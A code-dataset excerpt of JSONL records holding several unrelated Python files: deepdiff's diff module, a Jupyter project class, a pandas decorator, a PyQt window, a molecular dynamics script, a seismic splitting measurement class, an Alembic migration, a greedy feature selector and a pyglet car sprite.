\"{:.3f}\".format(1.1135) = 1.113, but \"{:.3f}\".format(1.11351) = 1.114\n # For Decimals, format seems to round 2.5 to 2 and 3.5 to 4 (to closest even number)\n t1_s = (\"{:.%sf}\" % self.significant_digits).format(level.t1)\n t2_s = (\"{:.%sf}\" % self.significant_digits).format(level.t2)\n\n # Special case for 0: \"-0.00\" should compare equal to \"0.00\"\n if set(t1_s) <= set(\"-0.\") and set(t2_s) <= set(\"-0.\"):\n return\n elif t1_s != t2_s:\n self.__report_result('values_changed', level)\n else:\n if level.t1 != level.t2:\n self.__report_result('values_changed', level)\n\n def __diff_types(self, level):\n \"\"\"Diff types\"\"\"\n level.report_type = 'type_changes'\n self.__report_result('type_changes', level)\n\n def __diff(self, level, parents_ids=frozenset({})):\n \"\"\"The main diff method\"\"\"\n if level.t1 is level.t2:\n return\n\n if self.__skip_this(level):\n return\n\n if type(level.t1) != type(level.t2):\n self.__diff_types(level)\n\n elif isinstance(level.t1, strings):\n self.__diff_str(level)\n\n elif isinstance(level.t1, numbers):\n self.__diff_numbers(level)\n\n elif isinstance(level.t1, Mapping):\n self.__diff_dict(level, parents_ids)\n\n elif isinstance(level.t1, tuple):\n self.__diff_tuple(level, parents_ids)\n\n elif isinstance(level.t1, (set, frozenset)):\n self.__diff_set(level)\n\n elif isinstance(level.t1, Iterable):\n if self.ignore_order:\n self.__diff_iterable_with_contenthash(level)\n else:\n self.__diff_iterable(level, parents_ids)\n\n else:\n self.__diff_obj(level, parents_ids)\n\n return\n\n @property\n def json(self):\n if not hasattr(self, '_json'):\n # copy of self removes all the extra attributes since it assumes\n # we have only a simple dictionary.\n copied = self.copy()\n self._json = jsonpickle.encode(copied)\n return self._json\n\n @json.deleter\n def json(self):\n del self._json\n\n @classmethod\n def from_json(self, value):\n return jsonpickle.decode(value)\n\n\nif __name__ == \"__main__\": # pragma: no cover\n if not py3:\n import sys\n sys.exit(\n \"Please run with Python 3 to verify the doc strings: python3 -m deepdiff.diff\"\n )\n import doctest\n doctest.testmod()\n","sub_path":"deepdiff/diff.py","file_name":"diff.py","file_ext":"py","file_size_in_byte":46207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"361091677","text":"import os\nimport json\nfrom ipywidgets import widgets\n\nimport mbt_comm\nfrom mbt_comm import message_set\nfrom serial import Dictable\nfrom cells import 
Cells\nfrom urllib import quote_plus\n\nfrom resources import Resources\nfrom models import Models\n\nclass Project(Dictable):\n __public__ = [\"resources\", \"models\", \"cells\"]\n\n def __init__(self, resources, models, cells = None):\n self.wid_prj_label = widgets.HTML(value=\"Project: \",\n font_weight=\"bold\")\n #\n # RESOURCES\n #\n self.resources = resources\n\n #\n # MODELS\n #\n self.mod = self.models = models\n self.models.parent_set(self)\n\n #\n # CELLS\n #\n if cells is None:\n self.cells = Cells([])\n else:\n self.cells = cells\n\n self.wid_prj_box = widgets.VBox(\n children=[self.wid_prj_label,\n self.resources.widget_get(),\n self.models.widget_get()],\n border_style=\"solid\", border_width=\"1px\", padding=\"8px\",\n border_radius=\"4px\")\n\n def cells_add(self, cells):\n self.cells = Cells(cells)\n\n @classmethod\n def load(cls, name, is_primary=True):\n prjdir = os.path.join(mbt_comm.OQ_MBT_HOME, quote_plus(name))\n prjdir_old = os.path.join(mbt_comm.OQ_MBT_HOME, name)\n\n if os.path.isdir(prjdir) is False:\n if os.path.isdir(prjdir_old) is True:\n # migration case\n os.rename(prjdir_old, prjdir)\n else:\n message_set(\"'%s' project not exists\" % name)\n return None\n\n filename = os.path.join(prjdir, 'project.json')\n if os.path.isfile(filename):\n # here the loading of project\n with open(filename, \"r\") as infile:\n prj = Dictable.deserialize(json.load(infile))\n else:\n # all parts must be initialized with defaults and\n # the json file must be created\n prj = Project([], [])\n prj.title_set(prjdir, name[:-4])\n prj.resources.parent_set(prj)\n if is_primary is True:\n prj.cells.load()\n prj.current_set()\n\n return prj\n\n @classmethod\n def create(cls, title):\n newdir = os.path.join(mbt_comm.OQ_MBT_HOME,\n quote_plus(title) + mbt_comm.OQ_MBT_SFX)\n if os.path.isdir(newdir):\n msg = \"'%s' project already exists\" % title\n return (None, msg)\n\n try:\n os.mkdir(newdir)\n except:\n msg = \"'%s' project creation failed\" % title\n return (None, msg)\n\n msg = \"'%s' project created\" % title\n prj = Project(Resources(), Models(), Cells())\n\n prj.title_set(newdir, title)\n prj.save()\n\n return (prj, msg)\n\n\n def save(self):\n filename = os.path.join(self.folder, 'project.json')\n\n with open(filename, \"w\") as outfile:\n json.dump(self.to_dict(), outfile, sort_keys=True, indent=4)\n\n return True\n\n def current_set(self):\n with open(os.path.join(mbt_comm.OQ_MBT_HOME, 'CURRENT_PRJ'), 'w') as f:\n title, _ = self.title_get()\n f.write(str(title))\n\n\n @classmethod\n def current_get(cls):\n with open(os.path.join(mbt_comm.OQ_MBT_HOME, 'CURRENT_PRJ'), 'r') as f:\n return f.read()\n return None\n\n def widget_get(self):\n return self.wid_prj_box\n\n def clean(self):\n # resources\n #self.res_contbox.children = []\n\n #for item in self.resources:\n # del item\n #self.resources = []\n # print \"TODO clean resources\"\n\n # models\n # print \"TODO clean models\"\n # wid_new_acc = widgets.Accordion(children=[], width=800)\n\n # self.models_contbox.children = [wid_new_acc]\n # del(self.models_cont)\n # self.models_cont = wid_new_acc\n pass\n\n def title_set(self, folder, name):\n self.title = name\n self.folder = folder\n self.wid_prj_label.value = \"Project: \" + name\n\n def title_get(self):\n return (self.title, self.folder)\n\n def __getitem__(self, key):\n id = self.resources.resource_find(key)\n if id == -1:\n raise KeyError\n return self.resources.resource_get(id).value\n\n def clear(self, key):\n id = self.resources.resource_find(key)\n if id == -1:\n raise 
KeyError\n return self.resources.resource_get(id).clear()\n\n def keys(self):\n return [x.key for x in self.resources.resources]\n\n def objpath(self, objname, is_leaf=True):\n if is_leaf:\n return (mbt_comm.OQ_MBT_HOME, os.path.join(quote_plus(self.title),\n 'data', quote_plus(objname)))\n else:\n return os.path.join(quote_plus(self.title), quote_plus(objname))\n","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":4954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"102470212","text":"import pandas as pd\nimport re\nfrom typing import Union, Callable\nfrom functools import wraps\n\n\ndef to_numeric(func: Callable):\n \"\"\"\n 将 DataFrame 或者 Series 尽可能地转为数字的装饰器\n\n Parameters\n ----------\n func : object\n 返回结果为 DataFrame 或者 Series 的函数\n \"\"\"\n\n ignore = ['股票代码', '基金代码', '代码', '市场类型']\n\n @wraps(func)\n def run(*args, **kwargs):\n values = func(*args, **kwargs)\n if isinstance(values, pd.DataFrame):\n for column in values.columns:\n if column not in ignore:\n\n values[column] = values[column].apply(convert)\n elif isinstance(values, pd.Series):\n for index in values.index:\n if index not in ignore:\n\n values[index] = convert(values[index])\n return values\n\n def convert(o: Union[str, int, float]) -> Union[str, float, int]:\n if not re.findall('\\d', str(o)):\n return o\n try:\n o = float(o)\n except:\n pass\n return o\n return run\n","sub_path":"efinance/utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"610300907","text":"# !/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nInterface de um simulador de tomada de decisão\n\nauthor: Cassiano Kunsch das Neves\nlast edited: 19/04/2015\n\"\"\"\nfrom PyQt4.QtGui import (QMainWindow, QDesktopWidget, QApplication, QWidget, QPushButton, QAction, QFileDialog)\nfrom View.MainTabWidget import MainTabWidget\n#from View.Window_dados import WinDados\nfrom View.Patio import Patio\n\n#__________________________________________________CLASSE_______________________________________________________________\n\nclass MainWindow(QMainWindow):\n def __init__(self, parent=None):\n super(MainWindow, self).__init__(parent)\n self.config()\n self.settings()\n\n def settings(self):\n screen = QDesktopWidget().screenGeometry()\n self.larg = screen.width()\n self.alt = screen.height()\n self.main_widget = MainTabWidget(self.larg, self.alt)\n self.showMaximized()\n #self.config()\n self.setCentralWidget(self.main_widget)\n #self.exec()\n\n def config(self):\n\n openFile = QAction('Abrir Pátio', self)\n openFile.setShortcut('Ctrl+O')\n openFile.setStatusTip('Inserir os dados para simular')\n openFile.triggered.connect(self.chama_dialog)\n\n menubar = self.menuBar()\n fileMenu = menubar.addMenu('&File')\n fileMenu.addAction(openFile)\n\n def showDialog(self):\n self.diag = WinDados()\n self.diag.setModal(True)\n self.diag.exec_()\n\n def chama_dialog(self):\n self.patio = Patio()\n self.patio.showDialog()\n\n","sub_path":"Aplicativo_TDD/View/MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"239648590","text":"import threading, numbers\nimport util\nfrom waldo.lib.proto_compiled.varStoreDeltas_pb2 import VarStoreDeltas\n\nfrom waldoObj import WaldoObj\n\n\nclass _SingleThreadReferenceBase(WaldoObj):\n 
'''\n Only one thread of control can access this variable. Example:\n local variables or sequence peered variables. Antonyms: peered\n data and endpoint global data.\n '''\n \n def __init__(self,host_uuid,peered,init_val,version_obj):\n '''\n @param {bool} peered --- True if this variable is a piece of\n sequence local data. False if it's just a regular-old local\n variable.\n '''\n self.host_uuid = host_uuid\n self.uuid = util.generate_uuid()\n self.val = init_val\n self.version_obj = version_obj \n self.peered = peered\n\n def is_peered(self):\n return self.peered\n \n def serializable_var_tuple_for_network(\n self,parent_delta,var_name,invalid_listener,force):\n '''\n The runtime automatically synchronizes data between both\n endpoints. When one side has updated a peered variable, the\n other side needs to attempt to apply those changes before\n doing further work. This method grabs the val and version\n object of the dirty element associated with invalid_listener.\n Using these data, plus var_name, it constructs a named tuple\n for serialization. (@see\n util._generate_serialization_named_tuple)\n\n Note: if the val of this object is another Reference object,\n then we recursively keep generating named tuples and embed\n them in the one we return.\n\n Note: we only serialize peered data. No other data gets sent\n over the network; therefore, it should not be serialized.\n\n @param {*Delta or VarStoreDeltas} parent_delta --- Append any\n message that we create here to this message.\n \n @param {String} var_name --- Both sides of the connection need\n to agree on a common name for the variable being serialized.\n This is to ensure that when the data are received by the other\n side we know which variable to put them into. This value is\n only really necessary for the outermost wrapping of the named\n type tuple, but we pass it through anyways.\n\n @param {bool} force --- True if regardless of whether modified\n or not we should serialize. False otherwise. (We migth want\n to force for instance the first time we send sequence data.)\n \n @returns {bool} --- True if some subelement was modified,\n False otherwise.\n '''\n # a val can either point to a waldo reference, a python value,\n # or a list/map of waldo references or a list/map of python\n # values.\n var_data = self.val\n\n if (not force) and (not self.version_obj.has_been_written_since_last_message):\n if (isinstance(var_data,numbers.Number) or\n util.is_string(var_data) or isinstance(var_data,bool)):\n # nothing to do because this value has not been\n # written. 
NOTE: for list/dict types, must actually\n # go through to ensure no subelements were written.\n return False\n\n sub_element_modified = False\n if self.py_val_serialize(parent_delta,var_data,var_name):\n sub_element_modified = True\n \n elif isinstance(var_data,list):\n list_delta = parent_delta.internal_list_delta\n list_delta.parent_type = VarStoreDeltas.INTERNAL_LIST_CONTAINER\n\n if force:\n # perform each operation as a write...\n self.version_obj.add_all_data_to_delta_list(\n list_delta,var_data,invalid_listener)\n sub_element_modified = True\n else:\n # if all subelements have not been modified, then we\n # do not need to keep track of these changes.\n # wVariable.waldoMap, wVariable.waldoList, or\n # wVariable.WaldoUserStruct will get rid of it later.\n sub_element_modified = self.version_obj.add_to_delta_list(\n list_delta,var_data,invalid_listener)\n\n elif isinstance(var_data,dict):\n map_delta = parent_delta.internal_map_delta\n map_delta.parent_type = VarStoreDeltas.INTERNAL_MAP_CONTAINER\n\n if force:\n # perform each operation as a write...\n self.version_obj.add_all_data_to_delta_list(\n map_delta,var_data,invalid_listener)\n sub_element_modified = True\n else:\n # if all subelements have not been modified, then we\n # do not need to keep track of these changes.\n # wVariable.waldoMap, wVariable.waldoList, or\n # wVariable.WaldoUserStruct will get rid of it later.\n sub_element_modified = self.version_obj.add_to_delta_list(\n map_delta,var_data,invalid_listener)\n\n \n else:\n # creating deltas for cases where internal data are waldo\n # references.... should have been overridden in\n # wVariables.py\n util.logger_assert('Serializing unknown type.')\n\n self.version_obj.has_been_written_since_last_message = False\n return sub_element_modified\n \n def py_val_serialize(self,parent,var_data,var_name):\n '''\n @param {} parent --- Either a ContainerAction a VarStoreDeltas.\n\n FIXME: unclear if actually need var_name for all elements\n py_serialize-ing, or just py variables that are in the\n top-level.\n\n @returns {bool} --- True if var_data was a python value type\n and we put it into parent. False otherwise.\n \n If is python value type, then adds a delta message to\n parent. 
Otherwise, does nothing.\n '''\n is_value_type = False\n delta = None\n if isinstance(var_data, numbers.Number):\n # can only add a pure number to var store a holder or to\n # an added key\n if parent.parent_type == VarStoreDeltas.VAR_STORE_DELTA:\n delta = parent.num_deltas.add()\n elif parent.parent_type == VarStoreDeltas.CONTAINER_ADDED:\n parent.added_what_num = var_data\n elif parent.parent_type == VarStoreDeltas.CONTAINER_WRITTEN:\n parent.what_written_num = var_data\n #### DEBUG\n else:\n util.logger_assert('Unexpected parent type in py_serialize')\n #### END DEBUG\n \n is_value_type = True\n \n elif util.is_string(var_data):\n if parent.parent_type == VarStoreDeltas.VAR_STORE_DELTA:\n delta = parent.text_deltas.add()\n elif parent.parent_type == VarStoreDeltas.CONTAINER_ADDED:\n parent.added_what_text = var_data\n elif parent.parent_type == VarStoreDeltas.CONTAINER_WRITTEN:\n parent.what_written_text = var_data\n \n #### DEBUG\n else:\n util.logger_assert('Unexpected parent type in py_serialize')\n #### END DEBUG \n \n is_value_type = True\n \n elif isinstance(var_data,bool):\n if parent.parent_type == VarStoreDeltas.VAR_STORE_DELTA:\n delta = parent.true_false_deltas.add()\n elif parent.parent_type == VarStoreDeltas.CONTAINER_ADDED:\n parent.added_what_tf = var_data\n elif parent.parent_type == VarStoreDeltas.CONTAINER_WRITTEN:\n parent.what_written_tf = var_data \n #### DEBUG\n else:\n util.logger_assert('Unexpected parent type in py_serialize')\n #### END DEBUG \n\n \n is_value_type = True\n\n if delta != None:\n # all value types have same format\n delta.var_name = var_name\n delta.var_data = var_data\n \n return is_value_type\n\n def get_val(self,invalid_listener):\n return self.val\n\n def write_if_different(self,invalid_listener,new_val):\n '''\n Will always write. Only reason method is\n named_write_if_different is to keep it consistent with\n interface for peered variables.\n '''\n self.val = new_val\n \n def write_val(self,invalid_listener,new_val,copy_if_peered=True):\n '''\n Writes to a copy of internal val, dirtying it\n '''\n self.val = new_val\n","sub_path":"waldo/lib/singleThreadReference.py","file_name":"singleThreadReference.py","file_ext":"py","file_size_in_byte":8717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"315651528","text":"#immediate things to do:\n#1. finish statistics X\n#2. add S(q,w) X\n#4. add tail corrections\n#5. Add final configuration\n#6. add a simple user interface function\n#7. clean up, make tidy\n#8. Add final configuration\n#9. add lots of comments\n#10. 
go through a second time to check I understand everything\n\nimport numpy as np\nimport cmath\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom mpl_toolkits.mplot3d import Axes3D\nimport random \nimport os\nimport subprocess as sub\nsub.call("rm -rf *.dat",shell=True)\n\n#simulation parameters organized by use or type:\n#**************************************************************\n#The user will create different physical scenarios with these.\n#macrostate:\nN=21 #number of particles\nrho=0.8 #density\nE=-3.00 #total energy per particle\n#time parameters:\nnblk=10\nnstep=10\ndt=0.001\n#**************************************************************\n#probably most of this stuff can be put into initialization function\n#The user does not need to touch these parameters ordinarily.\n#boundary conditions:\nvol=N/rho\nL=vol**(1/3)\n\n#chemical/physical:\nepsilon=1.0\nsigma=1.0\n#approximations\nrcut=2.5*sigma\nvcut=4.0*epsilon*((sigma/rcut)**12-(sigma/rcut)**6)\n#observables:\nn_obs=4 #Number of properties of the "walker"\niv = 0 #Potential energy index\niw = 1 #Virial index\nit = 2 #kinetic energy index \nie = 3 #Total energy index\nn_props=n_obs\n#for g(r)\nigofr = n_props\nnbins = 10\nn_props = n_props + nbins\nbin_size = (L/2.0)/nbins\n#for C_v(t_d)\ni_cv = n_props\nt_delay=100\nn_props = n_props + t_delay\n#for C_pq(t_d)\n#is there any reason why there would be two different delay times\ni_pq=n_props\n#number of wave vectors\nnq=5\n#can ask user to write file containing components of the q's \n#This is our first simple version for defining q along a single axis in q space\nqvec=np.empty(nq)\nfor i in range(nq):\n qvec[i]=i*2*np.pi/L\n\nn_props = n_props + t_delay*nq\nblk_norm=0.0\n\nwalker=np.zeros(n_props)\nblk_av=np.zeros(n_props)\nexp_av=np.zeros(n_props)\nstd2=np.zeros(n_props)\n\n#**************************************************************\n#user interface \n#makes code easier to use, run plotting and statistics from there\n#def interface():\n#**************************************************************\n\n#setup initial conditions\ndef initialize():\n #Global Variables\n global x,y,z,vx,vy,vz,vx0,vy0,vz0,pq,pq0\n\n #This part computes nced and the number of vacancies in the lattice\n count=0\n while count < N:\n N_test=4*(count**3)\n N_test_1=4*(count+1)**3\n if N == N_test:\n hole_flag=1\n nced=count\n N_hole=0\n break\n elif (N_test0.0, always\n ekin=(E*N)-vtot\n if ekin<0.0:\n print("WARNING: Unphysical initial configuration.")\n \n #use thermodynamics formula <ekin/N>=3T/2 to calculate temperature\n T=(2.0/3.0)*(ekin/N)\n\n #boost reference frame to center of mass frame of particle cloud\n vnet=np.zeros(3)\n for i in range(N):\n #uniform random velocities (adjusted later)\n vx[i]=np.random.uniform()-0.5\n vy[i]=np.random.uniform()-0.5\n vz[i]=np.random.uniform()-0.5\n #net velocity components\n vnet[0]=vnet[0]+vx[i]\n vnet[1]=vnet[1]+vy[i]\n vnet[2]=vnet[2]+vz[i]\n \n #components of net velocity per particle\n vnet[0]=vnet[0]/N\n vnet[1]=vnet[1]/N\n vnet[2]=vnet[2]/N\n\n #subtract off net velocity of cloud from velocity of each particle\n for i in range(N):\n vx[i]=vx[i]-vnet[0]\n vy[i]=vy[i]-vnet[1]\n vz[i]=vz[i]-vnet[2]\n\n #calculate velocities using the thermo formula\n sumv2=0.0\n for i in range(N):\n sumv2+= vx[i]*vx[i]+vy[i]*vy[i]+vz[i]*vz[i]\n sumv2 /= N\n \n fs = (3*T/sumv2)**0.5\n #rescale velocities so that they satisfy the thermo formula\n for i in range(N):\n vx[i] *= fs\n vy[i] *= fs\n vz[i] *= fs\n\n print("(N,V,E) = ", N," ", vol," ", E)\n 
print(\"PBC cell side length: L = \", L)\n print(\"Total potential energy: epot = \", vtot)\n print(\"Total energy: E = \", E)\n print(\"Temperature: T = \", T)\n\n#**************************************************************\n \n#potential energy for a pair of particles function\n#LJV(particles x positions, particles y positions, particles z positions, 1st particle index, 2nd particle index)\ndef LJV(q1, q2, q3, idi, idj):\n dx0=q1[idi]-q1[idj]\n dx0=dx0 - L*int(round(dx0/L))\n dy0=q2[idi]-q2[idj]\n dy0=dy0 - L*int(round(dy0/L))\n dz0=q3[idi]-q3[idj]\n dz0=dz0 - L*int(round(dz0/L))\n dr=dx0**2+dy0**2+dz0**2\n dr=dr**0.5\n v=4.0*epsilon*((sigma/dr)**12-(sigma/dr)**6)\n if dr>=rcut:\n v=0.0\n if dr= self.conf_95()\n elif surftype == 'min':\n confbool = self.errsurf <= self.conf_95()\n else:\n raise ValueError('surftype must be min or max')\n\n # tlag error\n lagbool = confbool.any(axis=1)\n # last true value - first true value\n truth = np.where(lagbool)[0]\n fdlag = (truth[-1] - truth[0] + 1) * lag_step * 0.25\n\n # fast error\n fastbool = confbool.any(axis=0)\n # trickier to handle due to cyclicity of angles\n # search for the longest continuous line of False values\n cyclic = np.hstack((fastbool,fastbool))\n lengthFalse = np.diff(np.where(cyclic)).max() - 1\n # shortest line that contains ALL true values is then:\n lengthTrue = fastbool.size - lengthFalse\n fdfast = lengthTrue * fast_step * 0.25\n\n # return\n return fdfast, fdlag \n \n \n # \"squashed\" profiles\n \n def fastprofile(self):\n surf = (self.lam1-self.lam2)/self.lam2\n surf = surf / surf.sum()\n return np.sum(surf, axis=0)\n \n def lagprofile(self):\n surf = (self.lam1-self.lam2)/self.lam2\n surf = surf / surf.sum()\n return np.sum(surf, axis=1)\n \n\n \n # Output\n \n # def report(self):\n # \"\"\"\n # Report the mesurement in tabular form.\n # \"\"\"\n # toprin\n \n \n # I/O stuff \n\n def save(self,filename):\n \"\"\"\n Save Measurement for future referral\n \"\"\"\n io.save(self,filename)\n \n def copy(self):\n return io.copy(self) \n \n \n # Plotting\n \n def _psurf(self,ax,**kwargs):\n \"\"\"\n Plot an error surface.\n \n **kwargs\n - cmap = 'magma'\n - vals = (M.lam1-M.lam2) / M.lam2\n - ax = None (creates new)\n \"\"\"\n \n if 'cmap' not in kwargs:\n kwargs['cmap'] = 'magma'\n \n if 'vals' not in kwargs:\n kwargs['vals'] = (self.lam1-self.lam2) / self.lam2\n \n # error surface\n cax = ax.contourf(self.lags,self.degs,kwargs['vals'],26,cmap=kwargs['cmap'])\n cbar = plt.colorbar(cax)\n ax.set_ylabel(r'Fast Direction ($^\\circ$)')\n ax.set_xlabel('Delay Time (' + self.units + ')')\n \n # confidence region\n if 'conf95' in kwargs and kwargs['conf95'] == True:\n ax.contour(self.lags,self.degs,self.errsurf,levels=[self.conf_95()])\n \n # marker\n if 'marker' in kwargs and kwargs['marker'] == True:\n ax.errorbar(self.lag,self.fast,xerr=self.dlag,yerr=self.dfast)\n\n ax.set_xlim([self.lags[0,0], self.lags[-1,0]])\n ax.set_ylim([self.degs[0,0], self.degs[0,-1]])\n \n # optional title\n if 'title' in kwargs:\n ax.set_title(kwargs['title']) \n \n # add info in text box\n if 'info' in kwargs and kwargs['info'] == True:\n textstr = '$\\phi=%.1f\\pm%.1f$\\n$\\delta t=%.2f\\pm%.2f$'%\\\n (self.fast,self.dfast,self.lag,self.dlag)\n # place a text box in upper left in axes coords\n props = dict(boxstyle='round', facecolor='white', alpha=0.5)\n ax.text(0.6, 0.95, textstr, transform=ax.transAxes, fontsize=12,\n verticalalignment='top', bbox=props)\n \n return ax\n \n def plot_profiles(self,**kwargs):\n # Error analysis\n fig,ax = 
plt.subplots(2)\n ax0 = plt.subplot(121)\n ax1 = plt.subplot(122)\n\n ax0.plot(self.degs[0,:],self.fastprofile())\n ax0.axvline(self.fast)\n ax0.axvline(self.fast-2*self.dfast,alpha=0.5)\n ax0.axvline(self.fast+2*self.dfast,alpha=0.5)\n ax0.set_title('fast direction')\n\n ax1.plot(self.lags[:,0],self.lagprofile())\n ax1.axvline(self.lag)\n ax1.axvline(self.lag-2*self.dlag,alpha=0.5)\n ax1.axvline(self.lag+2*self.dlag,alpha=0.5)\n ax1.set_title('lag direction')\n\n plt.show()\n\n\n # Comparison\n \n def __eq__(self, other) :\n # check same class\n if self.__class__ != other.__class__: return False\n # check same keys\n if set(self.__dict__) != set(other.__dict__): return False\n # check same values\n for key in self.__dict__.keys():\n if not np.all( self.__dict__[key] == other.__dict__[key]): return False\n # if reached here then the same\n return True\n \n\n \n","sub_path":"splitwavepy/measure/measure.py","file_name":"measure.py","file_ext":"py","file_size_in_byte":16771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"253441711","text":"# -*- coding: utf-8 -*-\n# Copyright (c) Youngwan Lee (ETRI) All Rights Reserved.\n\nfrom detectron2.config import CfgNode as CN\n\n\ndef add_san_config(cfg):\n \"\"\"\n Add config for VoVNet.\n \"\"\"\n _C = cfg\n\n _C.MODEL.SAN = CN()\n _C.MODEL.SAN.CONV_BODY = \"SAN19_pairwise\"\n _C.MODEL.SAN.BASE_PATH = \"../SAN/exp/imagenet/\"\n _C.MODEL.SAN.OUT_FEATURES = [\"res2\", \"res3\", \"res4\", \"res5\"]\n","sub_path":"san_detectron/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"176208260","text":"\"\"\"Parcel search\n\nRevision ID: 6004db4869c\nRevises: 2e222317d9ce\nCreate Date: 2016-01-21 11:13:44.508580\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '6004db4869c'\ndown_revision = '2e222317d9ce'\nbranch_labels = None\ndepends_on = None\n\nfrom alembic import op\nimport sqlalchemy as sa\nimport geoalchemy2\n\n\ndef upgrade():\n op.create_table(\n 'search_logs',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('time', sa.DateTime(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table(\n 'search_log_geometries',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('search_log_id', sa.Integer(), nullable=False),\n sa.Column('geometry', geoalchemy2.types.Geometry(\n geometry_type='POLYGON', srid=3857), nullable=True),\n sa.Column('identifier', sa.String(), nullable=True),\n sa.ForeignKeyConstraint(['search_log_id'], ['search_logs.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n\n\ndef downgrade():\n op.drop_table('search_log_geometries')\n op.drop_table('search_logs')\n","sub_path":"app/alembic/versions/6004db4869c_parcel_search.py","file_name":"6004db4869c_parcel_search.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"509262438","text":"import logging\n\nfrom pyFeatSel.FeatureSelectors.FeatureSelector import FeatureSelector\n\n\nclass GreedySearch(FeatureSelector):\n\n def run_selecting(self):\n column_names = self.train_data.columns.values.tolist()\n chosen_column_names = []\n early_stopping = False\n\n while len(column_names) > 0 and not early_stopping:\n result = self._inner_loop(column_names, 
chosen_column_names)\n if self.best_result is not None:\n if result[\"measure\"][\"test\"] < self.best_result[\"measure\"][\"test\"]:\n if self.maximize_measure:\n early_stopping = True\n else:\n self.best_result = result\n if result[\"measure\"][\"test\"] > self.best_result[\"measure\"][\"test\"]:\n if not self.maximize_measure:\n early_stopping = True\n else:\n self.best_result = result\n else:\n self.best_result = result\n if not early_stopping:\n chosen_column_names += [column_names.pop(result[\"col_id\"])]\n logging.info(\"Best solution! Test Measure: {0}, Val Measure: {1}\".format(self.best_result[\"measure\"][\"test\"],\n self.best_result[\"measure\"][\"val\"]))\n\n def _inner_loop(self, column_names: list, chosen_column_names: list):\n best_result = None\n for i, column_name in enumerate(column_names):\n col_names = [column_name] + chosen_column_names\n measure = self.inner_run(col_names)\n self.computed_features += [{\"measure\": measure, \"column_names\": col_names}]\n logging.debug(\"Test Measure: {0}, Val Measure: {1}\".format(measure[\"test\"], measure[\"val\"]))\n if best_result is None:\n best_result = {\"measure\": measure, \"column_names\": col_names, \"new_column\": column_name, \"col_id\": i}\n elif measure[\"test\"] > best_result[\"measure\"][\"test\"] and self.maximize_measure:\n best_result = {\"measure\": measure, \"column_names\": col_names, \"new_column\": column_name, \"col_id\": i}\n elif measure[\"test\"] < best_result[\"measure\"][\"test\"] and not self.maximize_measure:\n best_result = {\"measure\": measure, \"column_names\": col_names, \"new_column\": column_name, \"col_id\": i}\n else:\n continue\n return best_result\n\n","sub_path":"pyFeatSel/FeatureSelectors/GreedySearch.py","file_name":"GreedySearch.py","file_ext":"py","file_size_in_byte":2494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"529934878","text":"'''\nCreated on 2013-07-04\n\n@author: chris_000\n'''\nimport os\nimport math\nimport pyglet\nfrom pyglet.window import key\nfrom pyglet.sprite import Sprite\n\nclass Car(Sprite):\n def __init__(self, sim):\n self.sim = sim\n '''position'''\n self.posz = 0.0\n '''velocity'''\n self.velx = 0.0\n self.vely = 0.0\n self.velz = 0.0\n \n self.speed = 0\n self.angle = 0\n \n self.dx = 25\n \n self.FRICTION = 0.2\n self.POWER = 1\n self.BRAKEPOWER = 1.5\n self.MAXSPEED = 30\n \n '''sprite'''\n img = pyglet.image.load(os.path.join('res', 'car.png'))\n img.anchor_x = img.width / 2\n img.anchor_y = img.height / 4\n Sprite.__init__(self, img)\n #self.batch = sim.batch\n #self.rotation = 90\n \n def update(self):\n if self.sim.keys[key.UP]:\n if self.speed < self.MAXSPEED:\n self.speed += self.POWER\n elif self.sim.keys[key.DOWN]:\n if self.speed > 0:\n self.speed -= self.BRAKEPOWER\n else:\n self.speed = 0\n if self.sim.keys[key.LEFT]:\n if self.speed > 1:\n self.angle += 3.5\n if self.sim.keys[key.RIGHT]:\n if self.speed > 1:\n self.angle -= 3.5\n \n if self.speed > 0:\n self.speed -= self.FRICTION\n \n self.rotation = (360 - self.angle) + 90\n \n scale_x = math.cos(math.radians(self.angle))\n scale_y = math.sin(math.radians(self.angle))\n self.velx = self.speed * scale_x\n self.vely = self.speed * scale_y\n \n self.x += self.velx\n self.y += self.vely\n self.posz += self.velz\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n 
